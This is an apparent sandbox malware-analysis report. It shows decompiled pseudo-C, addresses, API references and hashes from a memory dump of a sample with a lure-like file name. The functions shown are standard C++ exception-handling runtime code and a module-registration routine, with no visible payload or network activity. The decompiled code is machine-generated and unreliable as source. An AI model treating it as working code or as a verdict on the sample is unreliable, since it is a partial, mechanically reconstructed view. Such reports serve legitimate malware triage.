				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00EA707A(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00EA8A26(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00EA5DCC(_t271, _t275, _t296, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00EA5DCC(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00EA4F23(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00EA4E56(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00EA6091(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00EA8A26(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00EA5DCC(_t270, _t275, _t296, _t301, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00EA5DCC(_t270, _t275, _t296, _t301, 0) + 0x10);
								_t259 = E00EA5DCC(_t270, _t275, _t296, _t301, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E00EA4E56(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00EA6091(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00EA536A(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00EA6B26(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
																	_t237 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x1c));
										_t264 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00EA6B26(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E00EA783D(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00EA67AF( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0xfe2230) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E00EA536A(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E00EA6797( &_v64);
											E00EA5D44( &_v64, 0xeb70d4);
											L64:
											 *(E00EA5DCC(_t270, _t275, _t296, _t301, _t315) + 0x10) = _t270;
											_t231 = E00EA5DCC(_t270, _t275, _t296, _t301, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E00EA5049(_t275, _t315, _t270);
											E00EA6A26(_a8, _a16, _t301);
											_t234 = E00EA6BE3(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E00EA699D(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}

0x00ea6111
0x00ea6118
0x00ea611a
0x00ea6123
0x00ea6129
0x00ea6131
0x00ea6133
0x00ea6136
0x00ea613c
0x00ea64b0
0x00ea64b0
0x00ea64b5
0x00ea64b7
0x00ea64b9
0x00ea64bc
0x00ea64bd
0x00ea64c0
0x00ea64c6
0x00ea65e5
0x00ea64cc
0x00ea64cc
0x00ea64cd
0x00ea64ce
0x00ea64d5
0x00ea64d8
0x00ea64db
0x00ea64e1
0x00ea64e3
0x00ea64e8
0x00ea64eb
0x00ea64ed
0x00ea64f3
0x00ea64f5
0x00ea64fb
0x00ea6510
0x00ea6515
0x00ea6518
0x00ea651a
0x00ea65e1
0x00000000
0x00ea65e2
0x00ea651a
0x00ea64fb
0x00ea64f3
0x00ea64eb
0x00ea6520
0x00ea6523
0x00ea6526
0x00ea6529
0x00ea652c
0x00ea6532
0x00ea6544
0x00ea6549
0x00ea654c
0x00ea654f
0x00ea6552
0x00ea6555
0x00ea6558
0x00ea655b
0x00000000
0x00000000
0x00ea6561
0x00ea6561
0x00ea6564
0x00ea6567
0x00ea6576
0x00ea6577
0x00ea6577
0x00ea6579
0x00ea657c
0x00000000
0x00000000
0x00ea657e
0x00ea6581
0x00000000
0x00000000
0x00ea658f
0x00ea6591
0x00ea6594
0x00ea6596
0x00ea659e
0x00ea659e
0x00ea65a1
0x00ea65a3
0x00ea65a5
0x00ea65c1
0x00ea65c6
0x00ea65c9
0x00ea65c9
0x00000000
0x00ea65a1
0x00ea6598
0x00ea659c
0x00000000
0x00000000
0x00000000
0x00ea65cc
0x00ea65cf
0x00ea65d0
0x00ea65d3
0x00ea65d6
0x00ea65d9
0x00ea65dc
0x00ea65dc
0x00000000
0x00ea6567
0x00ea65e6
0x00ea65eb
0x00ea65ec
0x00ea65ef
0x00ea65f2
0x00ea65f3
0x00ea65f4
0x00ea65f5
0x00ea65f8
0x00ea65fa
0x00ea6672
0x00ea6674
0x00ea6674
0x00ea65fc
0x00ea65fc
0x00ea65ff
0x00ea6602
0x00000000
0x00ea6604
0x00ea6604
0x00ea6607
0x00ea660a
0x00ea6611
0x00ea6611
0x00ea6614
0x00ea6616
0x00ea6618
0x00ea664a
0x00ea664a
0x00ea664d
0x00ea6654
0x00ea6654
0x00ea6657
0x00ea665a
0x00ea6661
0x00ea6661
0x00ea6664
0x00ea666b
0x00ea666d
0x00ea666d
0x00ea6666
0x00ea6666
0x00ea6669
0x00000000
0x00000000
0x00ea6669
0x00ea665c
0x00ea665c
0x00ea665f
0x00000000
0x00000000
0x00ea665f
0x00ea664f
0x00ea664f
0x00ea6652
0x00000000
0x00000000
0x00ea6652
0x00ea666e
0x00ea661a
0x00ea661a
0x00ea661a
0x00ea661d
0x00ea661d
0x00ea661f
0x00ea6621
0x00000000
0x00000000
0x00ea6623
0x00ea6625
0x00ea6639
0x00ea6639
0x00ea6627
0x00ea6627
0x00ea662a
0x00ea662d
0x00000000
0x00ea662f
0x00ea662f
0x00ea6632
0x00ea6635
0x00ea6637
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea6637
0x00ea662d
0x00ea6642
0x00ea6642
0x00ea6644
0x00000000
0x00ea6646
0x00ea6646
0x00ea6646
0x00000000
0x00ea6644
0x00ea663d
0x00ea663f
0x00ea663f
0x00000000
0x00ea663f
0x00ea660c
0x00ea660c
0x00ea660f
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea660f
0x00ea660a
0x00ea6602
0x00ea6675
0x00ea6679
0x00ea6679
0x00ea614b
0x00ea614b
0x00ea6154
0x00ea6251
0x00ea6251
0x00ea6254
0x00000000
0x00ea6183
0x00ea6183
0x00ea6188
0x00000000
0x00ea618e
0x00ea618e
0x00ea6196
0x00ea644a
0x00ea644e
0x00ea619c
0x00ea61a1
0x00ea61a4
0x00ea61a9
0x00ea61b0
0x00ea61b5
0x00000000
0x00ea61ed
0x00ea61f5
0x00ea6259
0x00ea6259
0x00ea625c
0x00ea625f
0x00ea6261
0x00ea6264
0x00ea6267
0x00ea626d
0x00ea6419
0x00ea6419
0x00ea641c
0x00000000
0x00ea641e
0x00ea641e
0x00ea6421
0x00000000
0x00ea6427
0x00ea6427
0x00ea642a
0x00ea642d
0x00ea642e
0x00ea642f
0x00ea6432
0x00ea6433
0x00ea6436
0x00ea6437
0x00ea643c
0x00000000
0x00ea643c
0x00ea6421
0x00ea6273
0x00ea6273
0x00ea6277
0x00000000
0x00ea627d
0x00ea627d
0x00ea6284
0x00ea629c
0x00ea629c
0x00ea629f
0x00ea62a2
0x00ea62a8
0x00ea62b8
0x00ea62bd
0x00ea62c0
0x00ea62c3
0x00ea62c6
0x00ea62c9
0x00ea62cc
0x00ea62cf
0x00ea62d5
0x00ea62d5
0x00ea62d8
0x00ea62db
0x00ea62ea
0x00ea62eb
0x00ea62eb
0x00ea62ed
0x00ea62f0
0x00ea62f6
0x00ea62f9
0x00ea62ff
0x00ea6301
0x00ea6304
0x00ea6307
0x00ea630d
0x00ea6310
0x00ea6315
0x00ea6315
0x00ea6318
0x00ea631b
0x00ea631e
0x00ea6321
0x00ea6324
0x00ea6329
0x00ea632a
0x00ea632b
0x00ea632c
0x00ea632d
0x00ea6330
0x00ea6333
0x00ea6335
0x00000000
0x00ea6337
0x00ea6337
0x00ea6337
0x00ea6338
0x00ea633a
0x00ea633d
0x00ea633e
0x00ea6343
0x00ea6346
0x00ea6348
0x00000000
0x00000000
0x00ea634a
0x00ea634d
0x00ea634e
0x00ea6351
0x00ea6353
0x00000000
0x00ea6355
0x00ea6355
0x00ea6358
0x00000000
0x00ea6358
0x00000000
0x00ea6353
0x00ea636c
0x00ea6372
0x00ea638f
0x00ea6394
0x00ea6394
0x00ea6397
0x00ea6397
0x00000000
0x00ea635b
0x00ea635b
0x00ea635c
0x00ea635f
0x00ea6362
0x00ea6365
0x00ea6365
0x00000000
0x00ea636a
0x00ea6307
0x00ea62f9
0x00ea639a
0x00ea639d
0x00ea639e
0x00ea63a1
0x00ea63a4
0x00ea63a7
0x00ea63aa
0x00ea63aa
0x00ea63b3
0x00ea63b6
0x00ea63b6
0x00ea62cf
0x00ea63b9
0x00ea63bd
0x00ea63bf
0x00ea63c2
0x00ea63c8
0x00ea63c8
0x00ea63d0
0x00ea63d5
0x00ea643f
0x00ea643f
0x00ea6444
0x00ea6448
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea63d7
0x00ea63da
0x00ea63dd
0x00ea63e1
0x00ea63ef
0x00ea63f1
0x00ea6408
0x00ea640c
0x00ea6412
0x00ea6413
0x00ea6415
0x00000000
0x00ea6417
0x00000000
0x00ea6417
0x00000000
0x00000000
0x00000000
0x00ea63e3
0x00ea63e3
0x00ea63e5
0x00000000
0x00ea63e7
0x00ea63e7
0x00ea63eb
0x00000000
0x00ea63ed
0x00ea63f3
0x00ea63f8
0x00ea63fb
0x00ea6400
0x00ea6403
0x00000000
0x00ea6403
0x00ea63eb
0x00ea63e5
0x00ea63e1
0x00ea6286
0x00ea6286
0x00ea628d
0x00000000
0x00ea628f
0x00ea628f
0x00ea6296
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea6296
0x00ea628d
0x00ea6284
0x00ea6277
0x00ea61f7
0x00ea61ff
0x00ea6202
0x00ea6207
0x00ea620b
0x00ea620e
0x00ea6214
0x00ea6217
0x00000000
0x00ea6219
0x00ea6219
0x00ea621c
0x00ea621e
0x00ea644f
0x00ea644f
0x00000000
0x00ea6224
0x00ea622c
0x00ea6237
0x00000000
0x00000000
0x00ea6240
0x00ea6243
0x00ea6244
0x00ea6247
0x00ea6249
0x00000000
0x00ea624f
0x00000000
0x00ea624f
0x00000000
0x00ea6249
0x00ea6224
0x00ea6454
0x00ea6454
0x00ea6456
0x00ea6457
0x00ea645e
0x00ea6461
0x00ea646f
0x00ea6474
0x00ea6479
0x00ea647c
0x00ea6481
0x00ea6484
0x00ea6487
0x00ea6489
0x00ea648b
0x00ea648b
0x00ea6490
0x00ea649c
0x00ea64a2
0x00ea64a7
0x00ea64aa
0x00ea64ab
0x00000000
0x00ea64ab
0x00ea6217
0x00ea61f5
0x00ea61b5
0x00ea6196
0x00ea6188
0x00ea6154

APIs

type_info::operator==.LIBVCRUNTIME ref: 00EA6230
___TypeMatch.LIBVCRUNTIME ref: 00EA633E
_UnwindNestedFrames.LIBCMT ref: 00EA6490
CallUnexpected.LIBVCRUNTIME ref: 00EA64AB

Strings

csm, xrefs: 00EA6267
csm, xrefs: 00EA61BB
csm, xrefs: 00EA614E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 4faf25c7960ee819cfbdbda4ab9608a0f18128e5952f3fd84ade6d599199c7ed
Instruction ID: 40feceeeb852b4241ddd5e309c60cec972a6c4b56b5d9150645f6359e3d3e5bd
Opcode Fuzzy Hash: 4faf25c7960ee819cfbdbda4ab9608a0f18128e5952f3fd84ade6d599199c7ed
Instruction Fuzzy Hash: 9BB16B728002099FCF14DFA4C8819AEBBB5BF5F318B18605AE8257F212D734FA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3790 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 244
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00EA3790(void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v268;
				char _v1314;
				struct HINSTANCE__* _v1316;
				char _v2356;
				unsigned int _v2360;
				signed int _v2364;
				signed int _v2368;
				char _v2372;
				char _v2396;
				char _v2412;
				signed int _v2424;
				void* __esi;
				void* __ebp;
				signed int _t50;
				signed int _t53;
				signed int _t55;
				long _t60;
				signed int _t63;
				signed int _t64;
				void* _t65;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				void* _t75;
				char* _t80;
				signed int _t86;
				signed int _t94;
				intOrPtr _t97;
				void* _t101;
				struct HINSTANCE__* _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr* _t119;
				signed int _t132;
				void* _t133;
				intOrPtr* _t137;
				signed int _t138;
				void* _t139;
				signed int _t140;
				intOrPtr* _t141;
				signed int _t143;
				void* _t145;
				void* _t147;

				_t130 = __edx;
				_t100 = __ebx;
				_t50 =  *0xeb9008; // 0x64e1d101
				_v8 = _t50 ^ _t143;
				_push(__ebx);
				_t137 = _a8;
				_push(__edi);
				_t132 = __ecx;
				_v2368 = __edx;
				_t53 = E00EA10C5(E00EA3762( &_v2412),  &_v2396);
				if(_t53 < 0) {
					L8:
					_t138 = _t53;
					goto L9;
				} else {
					_v2372 = 1;
					if(_t137 != 0) {
						while(1) {
							_t97 =  *_t137;
							if(_t97 == 0) {
								goto L5;
							}
							_push( *((intOrPtr*)(_t137 + 4)));
							_push(_t97);
							_push( &_v2412);
							E00EA1A54(_t100, _t132, _t137, __eflags);
							_t137 = _t137 + 8;
						}
					}
					L5:
					_t138 =  *((intOrPtr*)( *_t132 + 0x14))( &_v2412);
					if(_t138 < 0) {
						L9:
						E00EA19FE( &_v2412, _t132);
						_t55 = _t138;
						goto L10;
					} else {
						_t102 =  *0xfe2394; // 0xea0000
						_t132 = 0x104;
						_t140 = 0;
						_v2364 = 0;
						_t60 = GetModuleFileNameA(_t102,  &_v268, 0x104);
						if(_t60 != 0) {
							__eflags = _t60 - 0x104;
							if(_t60 != 0x104) {
								_t63 = E00EA74D0( &_v268) + 1;
								_t130 = _t63;
								_v2360 = _t63;
								_t64 = E00EA1181( &_v2360, _t63);
								_t147 = _t145 + 4;
								__eflags = _t64;
								if(_t64 < 0) {
									L21:
									_t138 = 0x8007000e;
									goto L9;
								} else {
									_t134 = _v2360;
									__eflags = _v2360 - 0x400;
									if(__eflags > 0) {
										L17:
										_t65 = E00EA3CD7( &_v2364, _t140, _t134);
										_t140 = _v2364;
									} else {
										_t94 = E00EA11AE(_t102, _t134, _t134, 0, __eflags);
										__eflags = _t94;
										if(_t94 == 0) {
											goto L17;
										} else {
											E00EB02F0(_t134);
											_t65 = _t147;
										}
									}
									_t130 =  &_v268;
									_t132 = E00EA121E(_t65,  &_v268, _t134 >> 1, 3);
									__eflags = _t132;
									if(_t132 != 0) {
										E00EA14EE( &_v2356, _t132);
										_pop(0);
										__eflags = _t102;
										if(_t102 == 0) {
											L25:
											_t102 = 0x22;
											_v1316 = _t102;
											_t69 = E00EA75E7( &_v2356);
											_t130 = 0x416;
											_t72 = E00EA1105( &_v1314, 0x416,  &_v2356, 2 + _t69 * 2);
											__eflags = _t72;
											if(_t72 == 0) {
												_t74 = E00EA75E7( &_v1316);
												_pop(_t119);
												 *(_t143 + _t74 * 2 - 0x520) = _t102;
												_t75 = 2 + _t74 * 2;
												__eflags = _t75 - 0x418;
												if(_t75 >= 0x418) {
													E00EA43FC();
													asm("int3");
													_push(_t143);
													_push(_t140);
													_t141 = _t119;
													 *_t141 = 0xeb613c;
													E00EA140D(_t102, _t119, _t132, _t141);
													__eflags = _v2424 & 0x00000001;
													if((_v2424 & 0x00000001) != 0) {
														_push(0x3c);
														E00EA42A0(_t141);
													}
													return _t141;
												} else {
													__eflags = 0;
													 *((short*)(_t143 + _t75 - 0x520)) = 0;
													_t80 =  &_v1316;
													goto L31;
												}
											} else {
												__eflags = _t140;
												if(_t140 != 0) {
													do {
														_t132 =  *_t140;
														_t140 = _t132;
														E00EA7188(_t140);
														__eflags = _t132;
													} while (_t132 != 0);
												}
												_t138 = 0x80004005;
												goto L9;
											}
										} else {
											__eflags = _t102 - GetModuleHandleA(0);
											if(__eflags == 0) {
												goto L25;
											} else {
												_t80 =  &_v2356;
												L31:
												_push(_t80);
												_push(L"Module");
												_push( &_v2412);
												_t103 = E00EA1A54(_t102, _t132, _t140, __eflags);
												__eflags = _t103;
												if(__eflags >= 0) {
													_push( &_v2356);
													_push(L"Module_Raw");
													_push( &_v2412);
													_t103 = E00EA1A54(_t103, _t132, _t140, __eflags);
													__eflags = _t103;
													if(_t103 >= 0) {
														__eflags = _a4;
														_t130 = _t132;
														_push(0);
														_push(_v2368);
														if(__eflags == 0) {
															_t86 = E00EA1F97(_t103,  &_v2412, _t130, _t132, _t140, __eflags);
														} else {
															_t86 = E00EA1DBF(_t103,  &_v2412, _t130, _t132, _t140, __eflags);
														}
														_t104 = _t86;
														__eflags = _t140;
														if(_t140 != 0) {
															do {
																_t132 =  *_t140;
																_t140 = _t132;
																E00EA7188(_t140);
																__eflags = _t132;
															} while (_t132 != 0);
														}
														E00EA19FE( &_v2412, _t132);
														_t55 = _t104;
													} else {
														__eflags = _t140;
														if(_t140 != 0) {
															do {
																_t132 =  *_t140;
																_t140 = _t132;
																E00EA7188(_t140);
																__eflags = _t132;
															} while (_t132 != 0);
														}
														goto L34;
													}
												} else {
													__eflags = _t140;
													if(_t140 != 0) {
														do {
															_t132 =  *_t140;
															_t140 = _t132;
															E00EA7188(_t140);
															__eflags = _t132;
														} while (_t132 != 0);
													}
													L34:
													_t138 = _t103;
													goto L9;
												}
												L10:
												_pop(_t133);
												_pop(_t139);
												_pop(_t101);
												return E00EA403C(_t55, _t101, _v8 ^ _t143, _t130, _t133, _t139);
											}
										}
